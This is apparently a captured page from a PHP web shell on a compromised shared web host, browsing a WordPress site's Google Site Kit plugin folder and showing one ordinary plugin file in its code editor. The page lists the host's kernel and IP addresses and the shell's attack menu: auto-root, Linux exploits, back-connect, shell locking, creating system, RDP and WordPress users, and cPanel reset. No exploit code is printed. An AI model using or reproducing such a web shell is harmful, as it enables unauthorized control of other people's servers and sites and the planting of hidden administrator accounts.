Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.129.69.0
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Dashboard_Sharing /
[ HOME SHELL ]
Name
Size
Permission
Action
Activity_Metrics
[ DIR ]
drwxr-xr-x
Dashboard_Sharing.php
1.76
KB
-rw-r--r--
View_Only_Pointer.php
2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dashboard_Sharing.php
<?php /** * Class Google\Site_Kit\Core\Dashboard_Sharing\Dashboard_Sharing * * @package Google\Site_Kit\Core\Dashboard_Sharing * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dashboard_Sharing; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Dashboard_Sharing\Activity_Metrics\Activity_Metrics; /** * Class for handling Dashboard Sharing. * * @since 1.82.0 * @access private * @ignore */ class Dashboard_Sharing { /** * Plugin context. * * @since 1.82.0 * @var Context */ private $context; /** * User_Options object. * * @since 1.82.0 * * @var User_Options */ private $user_options = null; /** * Activity_Metrics instance. * * @since 1.82.0 * @var Activity_Metrics */ protected $activity_metrics; /** * View_Only_Pointer instance. * * @since 1.83.0 * @var View_Only_Pointer */ protected $view_only_pointer; /** * Constructor. * * @since 1.82.0 * * @param Context $context Plugin context. * @param User_Options $user_options Optional. User Option API instance. Default is a new instance. */ public function __construct( Context $context, User_Options $user_options = null ) { $this->context = $context; $this->user_options = $user_options ?: new User_Options( $this->context ); $this->activity_metrics = new Activity_Metrics( $this->context, $this->user_options ); $this->view_only_pointer = new View_Only_Pointer(); } /** * Registers functionality. * * @since 1.82.0 */ public function register() { $this->activity_metrics->register(); $this->view_only_pointer->register(); } }
Close